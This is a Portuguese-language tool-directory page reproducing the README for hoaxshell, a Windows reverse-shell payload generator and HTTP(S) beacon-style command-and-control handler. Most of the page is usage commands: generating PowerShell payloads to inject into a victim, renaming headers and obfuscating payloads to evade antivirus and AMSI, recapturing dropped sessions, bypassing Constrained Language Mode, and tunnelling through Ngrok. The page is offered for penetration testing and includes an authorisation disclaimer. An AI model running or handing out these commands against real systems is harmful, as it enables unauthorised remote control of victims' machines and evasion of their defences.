Skip to content
KitploitKITPLOIT
FerramentasExploitsBlog
Log in
Enviar
FerramentasExploitsBlog
Enviar

Ferramentas de Hacking, PenTest e Cibersegurança para o seu Arsenal de Segurança!

Kitploit é um diretório de ferramentas de hacking, cibersegurança e pentesting. Descubra as últimas atualizações de projetos para encontrar vulnerabilidades, analisar sistemas, automatizar testes e fortalecer sua segurança.

··Feeds·Contato·Privacidade·© 2026 Kitploit

Diretório de Ferramentas

Categorias

Ver todas as categorias
Loading categories
hoaxshell — Um gerador e manipulador de payloads de reverse shell para Windows que abusa do protocolo http(s) para estabelecer um reverse shell semelhante a um beacon. | Kitploit
Ferramentas/GitHubGitHub/t3l3machus/hoaxshell
Escalada de PrivilégiosGeração de PayloadsExploraçãoEngenharia ReversaPós-ExploraçãoTestes de PenetraçãoComando e ControleRed Teaming
GitHubt3l3machus/hoaxshell

hoaxshell

Um gerador e manipulador de payloads de reverse shell para Windows que abusa do protocolo http(s) para estabelecer um reverse shell semelhante a um beacon.

Ver Repositório
3.5k524129há 1 anoRevisado pelo Kitploit

Mais Populares

Ver todos →

Descubra as ferramentas mais usadas pela nossa comunidade.

Explore todas as ferramentas

Navegue pela nossa coleção de ferramentas

Ver todas as ferramentas →
Compartilhar

hoaxshell

Python License

⚡ A versão mais recente deste projeto é o listener autônomo HoaxShell que vem com modelos de payload atualizados. Você também pode usá-lo diretamente de https://revshells.com (certifique-se de escolher hoaxshell como listener).

⚠️ A partir de 2022-10-18, o hoaxshell é detectado pelo AMSI (malware-encyclopedia). Você precisa ofuscar o payload gerado para poder usá-lo. Confira este vídeo sobre como ofuscar manualmente e contornar o MS Defender:

  • Exemplo com Hoaxshell -> youtube.com/watch?v=iElVfagdCD4
  • Exemplo com modelos comuns de revshell powershell -> youtube.com/watch?v=3HddKylkRzM

Propósito

hoaxshell é um gerador e manipulador de payloads de reverse shell para Windows que abusa do protocolo http(s) para estabelecer um reverse shell semelhante a um beacon, com base no seguinte conceito:

image

Esse conceito de c2 (que poderia ser implementado usando outros protocolos além do http ou exes pré-instalados) pode ser usado para estabelecer sessões que promovem a ilusão de se ter um shell, mas estão longe de um pty real.

O HoaxShell teve um bom desempenho contra softwares de AV (consulte a tabela de PoCs de bypass de AV para mais informações). Embora agora seja geralmente detectado, é fácil ofuscar o(s) payload(s) gerado(s) usando ferramentas automatizadas ou manualmente.

Aviso: Feito puramente para fins de teste e educacionais. NÃO execute os payloads gerados por esta ferramenta contra hosts que você não tenha permissão e autorização explícitas para testar. Você é responsável por qualquer problema que possa causar ao usar esta ferramenta.

Apresentações em Vídeo

[2022-10-11] Recente e incrível, feito por John Hammond -> youtube.com/watch?v=fgSARG82TJY
[2022-07-15] Demonstração do lançamento original, feita por mim -> youtube.com/watch?v=SEufgD5UxdU

Capturas de Tela

image

Encontre mais capturas de tela aqui.

Instalação

git clone https://github.com/t3l3machus/hoaxshell
cd ./hoaxshell
sudo pip3 install -r requirements.txt
chmod +x hoaxshell.py

Uso

Importante: Como forma de evitar detecção, o hoaxshell gera automaticamente valores aleatórios para o session id, caminhos de URL e o nome de um cabeçalho http personalizado utilizado no processo, toda vez que o script é iniciado. O payload gerado funcionará apenas para a instância para a qual foi gerado. Use a opção -g para contornar esse comportamento e restabelecer uma sessão ativa ou reutilizar um payload gerado anteriormente com uma nova instância do hoaxshell.

Sessão básica de shell via http

Quando você executa o hoaxshell, ele gera seu próprio payload PowerShell para você copiar e injetar na vítima. Por padrão, o payload é codificado em base64 por conveniência. Se você precisar do payload bruto, execute o comando "rawpayload" no prompt ou inicie o hoaxshell com o argumento -r. Depois que o payload for executado na vítima, você poderá executar comandos PowerShell contra ela.

Payload que utiliza Invoke-Expression (padrão)

sudo python3 hoaxshell.py -s <your_ip>

Payload que grava e executa comandos a partir de um arquivo

Use -x para fornecer um nome de arquivo .ps1 (caminho absoluto) a ser criado na máquina da vítima. Você deve verificar o payload bruto antes de executá-lo, garantindo que o caminho fornecido seja válido.

sudo python3 hoaxshell.py -s <your_ip> -x "C:\Users\\\$env:USERNAME\.local\hack.ps1"

Uso recomendado para evitar detecção (via http)

O hoaxshell utiliza um cabeçalho http para transferir informações da sessão do shell. Por padrão, o cabeçalho recebe um nome aleatório que pode ser detectado por regras de AV baseadas em regex. Use -H para fornecer um nome de cabeçalho http padrão ou personalizado para evitar detecção.

sudo python3 hoaxshell.py -s <your_ip> -i -H "Authorization"
sudo python3 hoaxshell.py -s <your_ip> -i -H "Authorization" -x "C:\Users\\\$env:USERNAME\.local\hack.ps1"

Sessão de shell criptografada (https + certificado autoassinado)

Esse payload específico é meio que um sinal de alerta, pois começa com um bloco adicional de código que instrui o PowerShell a ignorar as verificações de certificado SSL, o que o torna suspeito e fácil de detectar, além de significativamente mais longo. Não é recomendado.

# Generate self-signed certificate:
openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365

# Pass the cert.pem and key.pem as arguments:
sudo python3 hoaxshell.py -s <your_ip> -c </path/to/cert.pem> -k <path/to/key.pem>

Sessão de shell criptografada com certificado confiável

Se você possui um domínio, use esta opção para gerar um payload https mais curto e menos detectável, fornecendo seu DN com -s juntamente com um certificado confiável (-c cert.pem -k privkey.pem).

sudo python3 hoaxshell.py -s <your.domain.com> -t -c </path/to/cert.pem> -k <path/to/key.pem>

Modo de captura de sessão

Caso você feche seu terminal acidentalmente, haja uma queda de energia ou algo do tipo, você pode iniciar o hoaxshell no modo de captura de sessão, que tentará restabelecer uma sessão, desde que o payload ainda esteja em execução na máquina da vítima.

sudo python3 hoaxshell.py -s <your_ip> -g

Importante: Certifique-se de iniciar o hoaxshell com as mesmas configurações da sessão que você está tentando restaurar (http/https, porta, etc).

Suporte ao modo de linguagem restrita

Use qualquer uma das variações de payload com a opção -cm (--constraint-mode) para gerar um payload que funcione mesmo se a vítima estiver configurada para executar o PS no Modo de Linguagem Restrita (Constraint Language mode). Ao usar essa opção, você sacrifica um pouco da precisão da decodificação do stdout do seu reverse shell.

sudo python3 hoaxshell.py -s <your_ip> -cm

image

Sessão de shell via https usando ferramentas de tunelamento (Ngrok / LocalTunnel)

Utilize os programas de tunelamento Ngrok ou LocalTunnel para obter sessões através de túneis seguros, superando problemas como não ter um endereço IP estático ou seu ISP proibir Port-Forwarding.

Use -ng ou --ngrok para o servidor Ngrok

sudo python3 hoaxshell.py -ng

Use -lt ou --localtunnel para o servidor LocalTunnel

sudo python3 hoaxshell.py -lt

Limitações

O shell vai travar se você executar um comando que inicie uma sessão interativa. Exemplo:

# this command will execute succesfully and you will have no problem: 
> powershell echo 'This is a test'

# But this one will open an interactive session within the hoaxshell session and is going to cause the shell to hang:
> powershell
Baixar ferramenta